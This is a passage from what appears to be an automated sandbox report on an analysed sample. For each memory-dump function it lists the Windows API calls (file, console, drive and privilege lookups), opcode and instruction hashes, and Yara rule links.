                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01D0BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 244dfbc7503985a4c9a658b0275a683c858deedcdbe1be2e40252a48de8cfd83
                                                        • Instruction ID: 987c3a59f99696dfa7e8364bed17bd737e6823ebb64a113dc030422c3c5eed69
                                                        • Opcode Fuzzy Hash: 244dfbc7503985a4c9a658b0275a683c858deedcdbe1be2e40252a48de8cfd83
                                                        • Instruction Fuzzy Hash: A5119076508380AFDB22CF65CC44B53FFF4EF09210F08849EE9898B662D375A458CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F0886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,9B7E4B62,00000000,00000000,00000000,00000000), ref: 025F08E5
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 983fa1f6e76113cc66d24388ad342c284ce8f366243ae47321a48d4c9ee43996
                                                        • Instruction ID: 4e7806f52e26f9da086f7ccf327cb9704143b951c0bb7a1063a7e570e903a952
                                                        • Opcode Fuzzy Hash: 983fa1f6e76113cc66d24388ad342c284ce8f366243ae47321a48d4c9ee43996
                                                        • Instruction Fuzzy Hash: 4111B272500300EFFB21DF51DC45F96FBA8EF14720F08855AEE499B186D671A504CBB5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        • Opcode ID: ade5e186307b0169de4174fcd105f212647736d029db34cf19f1af35351afbce
                                                        • Instruction ID: 2fe349c648862d750a764ff26be550c93a9a3e8e015198c6db4ae19f92d00093
                                                        • Opcode Fuzzy Hash: ade5e186307b0169de4174fcd105f212647736d029db34cf19f1af35351afbce
                                                        • Instruction Fuzzy Hash: 90113D715093C49FE7128B15DC54B62BFB4DF47614F0880DAEDC54B263D265A808DB72
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F12D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 025F132F
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: 10f55b48fa69e91c45ac3d62a609a5677cf8499400433546f12b94dc63b062c7
                                                        • Instruction ID: b7714c205fa211954c4d91185b4bdeca909cd785e61c7ceef364b43fefa3b1f3
                                                        • Opcode Fuzzy Hash: 10f55b48fa69e91c45ac3d62a609a5677cf8499400433546f12b94dc63b062c7
                                                        • Instruction Fuzzy Hash: DC1191715093849FDB118F25DC85B96FFE4EF46220F0984EEED498B262D275A808CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F05E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 025F0640
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: b2c082cb28398878800c17a86e985d55fcb0b58755f88c604dad3d203c256249
                                                        • Instruction ID: 910330cbf25fa7786e2d9e60799f92cc319d76337cabd1df04514cb8728b62c2
                                                        • Opcode Fuzzy Hash: b2c082cb28398878800c17a86e985d55fcb0b58755f88c604dad3d203c256249
                                                        • Instruction Fuzzy Hash: 0C11C2765093C09FDB128B15DC95B52FFB4EF42220F0880DBED858B6A3D265A908CB72
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D0AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 3016e1d1a7fd5d9402bf1e659ad91541bfc21a211fa67e1974330e09bebd8e3e
                                                        • Instruction ID: 37e10077d90317657e2b4138ed7186638e9a3f7ba42aa3ab701f304d091b1cb3
                                                        • Opcode Fuzzy Hash: 3016e1d1a7fd5d9402bf1e659ad91541bfc21a211fa67e1974330e09bebd8e3e
                                                        • Instruction Fuzzy Hash: 771184B26007009FEB21DF29DC85B56FBE8EF14621F08C4AAED49CB692D674E444CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01D0AA71
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: 5fa606af6aac93086b58caa0935c7bd977b34b04794eeb6d00420720e28d1b2e
                                                        • Instruction ID: f2102c4bb1c7165504d0b153ff7bf609b7684a5d348ca5528fd7b5c2844a1bd6
                                                        • Opcode Fuzzy Hash: 5fa606af6aac93086b58caa0935c7bd977b34b04794eeb6d00420720e28d1b2e
                                                        • Instruction Fuzzy Hash: 2E1191754097C09FE7128B15DC85B92BFB4EF07224F0980DBDD858F1A3D269A909D772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 025F099C
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 637f56bf9e67a7fcb5d2921050b9db53347a89a7cd7acdc91e142ecfd6e270e0
                                                        • Instruction ID: acc3296f516873dce2164ebb8ebbe1cc2fac2b5a3a82f7ddb14a2cf786de448f
                                                        • Opcode Fuzzy Hash: 637f56bf9e67a7fcb5d2921050b9db53347a89a7cd7acdc91e142ecfd6e270e0
                                                        • Instruction Fuzzy Hash: 84119D719093C09FE7128B25DC55B92BFB4EF07324F09C0DADD884B263D265A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F07C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,9B7E4B62,00000000,00000000,00000000,00000000), ref: 025F0819
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: fce50ab70422e7bc9099cb01b70250201ed8873d90d1617ad1bb886a8b8fd355
                                                        • Instruction ID: cef01d885d49aa84385b3921041405c224aebdc31bc8434ece1f2d533a89c6be
                                                        • Opcode Fuzzy Hash: fce50ab70422e7bc9099cb01b70250201ed8873d90d1617ad1bb886a8b8fd355
                                                        • Instruction Fuzzy Hash: 5F01C475500304EFFB609F01DC85F66FB98EF44720F18C496EE099A286D674A904CAB5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F13AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: b78c3230193f28525d8f6f091df0063dd699f562425af514ef0b6d1408d4d429
                                                        • Instruction ID: 7a14988f261d9a198169dc29e92cd291f0f6abe3e6e11f62c8ab42b42047d582
                                                        • Opcode Fuzzy Hash: b78c3230193f28525d8f6f091df0063dd699f562425af514ef0b6d1408d4d429
                                                        • Instruction Fuzzy Hash: 44118B76500B00DFEB60DF56DC85B66FBA4EF44220F08C4AEEE498B652D371E408DB65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01D0ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: d7d9543afe1c8337ee3c29c0f9269c59e6578fe4543ca0d9e69a179aff5234da
                                                        • Instruction ID: 568375e8709aa33e5b878f3bcb1be3fed411f6864095f7eab9dd6a5fe9f4292f
                                                        • Opcode Fuzzy Hash: d7d9543afe1c8337ee3c29c0f9269c59e6578fe4543ca0d9e69a179aff5234da
                                                        • Instruction Fuzzy Hash: D411C2B54093809FDB11CF15DC85B82BFA4EF42320F0980EBDD488F153D274A508CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01D0BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 9c5df3a0312a29e6c1dbde2a000e7087dd12b9fdafc31b1cdb2841fed09c5f67
                                                        • Instruction ID: 4755bc80f30bc7ad425407e2ab675aa846a899046d10553de39283e896659842
                                                        • Opcode Fuzzy Hash: 9c5df3a0312a29e6c1dbde2a000e7087dd12b9fdafc31b1cdb2841fed09c5f67
                                                        • Instruction Fuzzy Hash: 9E118E76504700DFEB22CF55DC84B52FBE4EF08311F0885AAEE898A652D3B1E454DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnumWindows.USER32(?,00000E9C,?,?), ref: 01D0A23E
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumWindows
                                                        • String ID:
                                                        • API String ID: 1129996299-0
                                                        • Opcode ID: fad868d123f61947640d2975c9c825e017d3b5f13d81afba88362755d953f0af
                                                        • Instruction ID: 868b3e4acd1d7552b9c3ff53e29d8cd029887aa81b0be56c09495f4247de96f9
                                                        • Opcode Fuzzy Hash: fad868d123f61947640d2975c9c825e017d3b5f13d81afba88362755d953f0af
                                                        • Instruction Fuzzy Hash: 8E017171900600AFE310DF16DD86B66FBB8FB84A20F14816AED089B741D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 025F109E
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 6fde69cf5a26f41e4cd88babf9ea376518873d6e4bd657718682fa84e0fc604e
                                                        • Instruction ID: 6099210f7bed9848844c995acc223e5925fa4ccda7dcfa18a7d4f9a852d840c2
                                                        • Opcode Fuzzy Hash: 6fde69cf5a26f41e4cd88babf9ea376518873d6e4bd657718682fa84e0fc604e
                                                        • Instruction Fuzzy Hash: CE017171900600AFE310DF16DD86B66FBB8FB84B20F14816AED089B741D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F0196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 025F01D0
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: 4c011dbb3d6b9e37b87e675c625e6f84f7e2fe7cca83a54ad956cf65e8f09669
                                                        • Instruction ID: fcb12eb825d009f3f54f39c7c8d55c1a8135973333caee592f8fb151d3520c35
                                                        • Opcode Fuzzy Hash: 4c011dbb3d6b9e37b87e675c625e6f84f7e2fe7cca83a54ad956cf65e8f09669
                                                        • Instruction Fuzzy Hash: 41015E71600744DFEB50DF65DC85BA6FBA8EF41620F08C4AADD09CB686D674E404CA65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01D0BB2F
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        • Opcode ID: e6578c95afc2a9aa4dec29fe1c5247ae26712cc8630c2c05736bae9f6b8ee911
                                                        • Instruction ID: 209aa2a345ea79aba704a33d5a940eaffdf0dbb079e3cff9878e3fefa8629401
                                                        • Opcode Fuzzy Hash: e6578c95afc2a9aa4dec29fe1c5247ae26712cc8630c2c05736bae9f6b8ee911
                                                        • Instruction Fuzzy Hash: 7501DF75904600DFEB21CF19DC85BA5FBA4EF04620F08C4AFDD498B296D275E804CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F12FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 025F132F
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: f84f8882ac07a2d437f87e37c7be035e4a2764158178e571748f6045b865bfd4
                                                        • Instruction ID: 0ffa892d15d90ed633d2457107e32b50a01aeba1c1fa4d3aa99d4ac5b992aae5
                                                        • Opcode Fuzzy Hash: f84f8882ac07a2d437f87e37c7be035e4a2764158178e571748f6045b865bfd4
                                                        • Instruction Fuzzy Hash: ED01BC71910740DFEF509F15D885BA9FBA4EF04620F08C4AADE098B692D275A404CB66
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01D0A94A
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: fcad9af6cc14845356528f964e2f4ad1b1fe5f4628af662b5c2abf97fdfe5b61
                                                        • Instruction ID: 4b4f3e36bb73c832c985cab53dcfe902202b0fade1541685086c7ccbaaf8a7c2
                                                        • Opcode Fuzzy Hash: fcad9af6cc14845356528f964e2f4ad1b1fe5f4628af662b5c2abf97fdfe5b61
                                                        • Instruction Fuzzy Hash: 58016271900600ABE314DF16DD86B26FBB4FB88B20F14825AED085B741D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F0F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 025F0FB0
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: 1f3408c49d1aa06843b6610034918dae6ea1689b43199eea890fdfe63de20cb0
                                                        • Instruction ID: 77b604346b5387fced30bc758e2a7299250f2b0a6a246c8e21703a600761e7f4
                                                        • Opcode Fuzzy Hash: 1f3408c49d1aa06843b6610034918dae6ea1689b43199eea890fdfe63de20cb0
                                                        • Instruction Fuzzy Hash: 68017C71500340DFEB60DF15DC85B66FBA4EF00620F08C4AADE488F28AE374E504CAA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F04B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 025F0502
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: a82be054d2d2db938205faae82821faa0ed789a2c5800f557cc12151a9b99ad3
                                                        • Instruction ID: 92a80aa2052b493652bc7c9ecbde00b21b4d3a44061742c9a79cc84264d70763
                                                        • Opcode Fuzzy Hash: a82be054d2d2db938205faae82821faa0ed789a2c5800f557cc12151a9b99ad3
                                                        • Instruction Fuzzy Hash: 1D016271900600ABE314DF16DD86B26FBB4FB88B20F14825AED085B741D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 025F0640
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 7d77dd7af09df27d515cbc3947f5941418384784f73aba405e6db621e98cd0ff
                                                        • Instruction ID: e4d35631036a7f9d4f8381159adcfea006f167b8ae14d3a79a2b7648d019bdcd
                                                        • Opcode Fuzzy Hash: 7d77dd7af09df27d515cbc3947f5941418384784f73aba405e6db621e98cd0ff
                                                        • Instruction Fuzzy Hash: 9801FF35600700DFEB608F15D885B65FFA0EF41720F08C0AADE0A8B796D774E808CAA6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01D0ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: afb9acb7d4c92458672a49d85df62387b3e689fee20d9efe4563378591ae85c8
                                                        • Instruction ID: 46fefc835aa25835b4129f28ae1353c613961d1f1f4d2564a8e5d7d9c571a042
                                                        • Opcode Fuzzy Hash: afb9acb7d4c92458672a49d85df62387b3e689fee20d9efe4563378591ae85c8
                                                        • Instruction Fuzzy Hash: D701DC31404740DFEB11DF1AD889BA5FBA4EF04620F08C4AADD488F282D274A404CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F1116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 025F1148
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: cc98af5bf0156b6750de92cc6b68c0e8863091a7f0a4054f505366a120c00c13
                                                        • Instruction ID: ac756bebf2fe1db7d5dd2aa756c6389e80b888741ad95215c65bcc6c96c27add
                                                        • Opcode Fuzzy Hash: cc98af5bf0156b6750de92cc6b68c0e8863091a7f0a4054f505366a120c00c13
                                                        • Instruction Fuzzy Hash: 91F0FF35500B40DFEB60CF05D885B66FFA0EF01B21F08C0DADE0C4B312D275A448CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        • Opcode ID: 95f422d91ce49dd2fe0e2e2f6e9a652853340a462348ebb9cbfd14d53d0672ea
                                                        • Instruction ID: e6f7e9741be85b07817fe69abed85059d5a9c8e27c6cb1291bd00c7a4d4f8b98
                                                        • Opcode Fuzzy Hash: 95f422d91ce49dd2fe0e2e2f6e9a652853340a462348ebb9cbfd14d53d0672ea
                                                        • Instruction Fuzzy Hash: C3F0AF35504740DFEB219F45D885765FBA0EF04721F08C09ADD494B352D3B5E804CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01D0AA71
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: ce57ad0cce3ca4c65c1aed9dcb45646d4582e25a528dc59c71db974570841500
                                                        • Instruction ID: f8e8fdf7915cb9dd229cdb7cbff93c3ec51cf9c4da0100382b2347261ed690c3
                                                        • Opcode Fuzzy Hash: ce57ad0cce3ca4c65c1aed9dcb45646d4582e25a528dc59c71db974570841500
                                                        • Instruction Fuzzy Hash: 59F0CD31500740DFEB12DF09D989762FBA0EF08621F08C0DADD494F292D2B8E588CAB2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01D0A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: ee56bcf652352c2947b6697f5a0a8b25ae40e39f0eb82500223187ed2bc24fd8
                                                        • Instruction ID: c553fe982c156afec0f0550a89811b8b2384978b6ca229e2b5690eba5688b0b4
                                                        • Opcode Fuzzy Hash: ee56bcf652352c2947b6697f5a0a8b25ae40e39f0eb82500223187ed2bc24fd8
                                                        • Instruction Fuzzy Hash: CB1191715093809FD712CF25DC85B96BFA4DF46320F0980EBED498B2A2D275A848CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01D0A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 7b76227ea9485b1cdd2ed21c4b0f6165877239b509e78a6cdd8934aab3021cab
                                                        • Instruction ID: 09ff85496dc9b8b4002f6c016e471b8e099128eda93ba12687b26d819fb0dd0f
                                                        • Opcode Fuzzy Hash: 7b76227ea9485b1cdd2ed21c4b0f6165877239b509e78a6cdd8934aab3021cab
                                                        • Instruction Fuzzy Hash: 0F01F275600740DFEB11DF19DC85BA6FBA4DF04320F48C0ABDD098B282D275E844CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02B20810, Relevance: .1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2102816800.0000000002B20000.00000040.00000001.sdmp, Offset: 02B20000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3a2f5e65a2ee8acb790d1541dddd1808a6468f84b71552887edc5fb8a3bd0e17
                                                        • Instruction ID: 6c9f88323ec4d093b1279f6a849ac01d258086b01f4224e2b9c1463b63bdf924
                                                        • Opcode Fuzzy Hash: 3a2f5e65a2ee8acb790d1541dddd1808a6468f84b71552887edc5fb8a3bd0e17
                                                        • Instruction Fuzzy Hash: 4201EF6110E3D19FC3138B7469A9499BFB1AE17154B0F81DBD1C5CF1A3D6684C8AC762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025A081E, Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101921482.00000000025A0000.00000040.00000040.sdmp, Offset: 025A0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dc8cac725dd02bcb2b9d143ac0ca461a1274afaeb00d153077e13182eec8548f
                                                        • Instruction ID: 251c5b6138d2cad0450bc52ea7f4aa5aa306905849b8254dec935ef4b5a93740
                                                        • Opcode Fuzzy Hash: dc8cac725dd02bcb2b9d143ac0ca461a1274afaeb00d153077e13182eec8548f
                                                        • Instruction Fuzzy Hash: 28E09276A007009BD750DF0AEC81852F7E4EB84A30B58C07FDC0D8B710E135B504CAB5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D023F4, Relevance: .0, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098686883.0000000001D02000.00000040.00000001.sdmp, Offset: 01D02000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 312acb63799ea7d46ef8686c54dbad9c7960031b086be9f7d1070e0046406a49
                                                        • Instruction ID: cb7b82b6485ba066fea94e4e304361e55e95c853ea08c874d206cf56f0103c0e
                                                        • Opcode Fuzzy Hash: 312acb63799ea7d46ef8686c54dbad9c7960031b086be9f7d1070e0046406a49
                                                        • Instruction Fuzzy Hash: 6CD05E79206A818FE7178A1CC1A9B953BA4AF69B04F4744F9E840CB6A3C768E581D200
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D023BC, Relevance: .0, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098686883.0000000001D02000.00000040.00000001.sdmp, Offset: 01D02000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 11c7749fea046450e99cd3c37502e8e8ee3b2778dbcb0bb9ac7b045b0b673433
                                                        • Instruction ID: c4909107b4481ad85e9de3fad9675044024ddf25576ed82ac3a5ea0d7b6f4677
                                                        • Opcode Fuzzy Hash: 11c7749fea046450e99cd3c37502e8e8ee3b2778dbcb0bb9ac7b045b0b673433
